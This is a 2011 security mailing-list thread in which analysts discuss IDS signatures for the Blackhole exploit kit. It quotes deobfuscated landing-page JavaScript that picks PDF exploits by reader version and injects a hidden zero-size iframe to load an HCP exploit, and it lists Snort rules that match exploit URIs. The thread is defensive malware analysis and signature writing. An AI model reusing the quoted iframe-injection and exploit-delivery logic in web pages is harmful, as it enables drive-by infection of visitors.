[Emerging-Sigs] Proposed Signature for Blackhole Exploit Landing malicious applet

Chris Wakelin c.d.wakelin at reading.ac.uk
Mon Oct 3 10:32:42 EDT 2011


Hmm, looking at one from last week we have (thanks to my yucky decoder +
jsbeautifier.py):-

> function spl5() {
>     if (pdfver[0] > 0 && pdfver[0] < 8) {
>         show_pdf('./content/1fdp.php?f=22')
>     } else if ((pdfver[0] == 8) || (pdfver[0] == 9 && pdfver[1] <= 3)) {
>         show_pdf2('./content/2fdp.php?f=22')
>     }
>     spl6()
> }

(I've never seen a 1fdp.php download - perhaps it's too old an exploit now!)

> function spl6() {
>     try {
>         for (var i = 0, m; i < navigator.plugins.length; i++) {
>             var name = navigator.plugins[i].name;
>             if (name.indexOf('Media Player') != -1) {
>                 m = document.createElement('IFRAME');
>                 m.setAttribute('src', './content/pch2.php?c=22');
>                 m.setAttribute('width', 0);
>                 m.setAttribute('height', 0);
>                 document.body.appendChild(m)
>             }
>         }
>     } catch (e) {}
>     setTimeout(spl7, 1000)
> }

I'm not sure I've ever seen a pch2.php download either (other than by
me!), but I guess we could add detection for this?

Best Wishes,
Chris

On 03/10/11 15:13, Nathan wrote:
> On Mon, 03 Oct 2011 15:07:59 +0100 Chris Wakelin <c.d.wakelin at reading.ac.uk>
> wrote
> 
>> Looking at the actual exploit kit, they're including the Java and PDF
>> exploits but not the Flash or HCP exploits (whatever HCP is?) at the moment.
> 
> It's the Help Control Protocol, another pseudo-protocol used by Win32,
> 'hcp://'.  There were a few vulnerabilities out for it and it looks like the
> exploit kits are leveraging it.  From what I recall I do have one up there for
> HCP in less than Media Player 10.0... I believe I wrote 2013077 so it may need
> some updating if the URI has changed.
> 
> http://blogs.technet.com/b/srd/archive/2010/06/10/help-and-support-center-vulnerability-full-disclosure-posting.aspx
> 
> emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
> $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP overflow Media
> Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f=";
> http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity;
> sid:2013077; rev:1;)
> 
> emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
> $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit";
> flow:established,to_server; content:"/pch.php?f="; http_uri;
> pcre:"/pch\.php\?f=\d+$/U"; classtype:bad-unknown; sid:2013548; rev:1;)
> 
> emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET 
> $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit 2";
> flow:established,to_server; content:"/hcp_vbs.php?f="; http_uri;
> pcre:"/hcp_vbs\.php\?f=\d+&d=\d+$/U"; classtype:bad-unknown; sid:2013549;
> rev:1;)
> 
> Thanks,
> Nathan
> 
> 


-- 
--+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 2908
Whiteknights, Reading, RG6 6AF, UK              Fax: +44 (0)118 975 3094


More information about the Emerging-sigs mailing list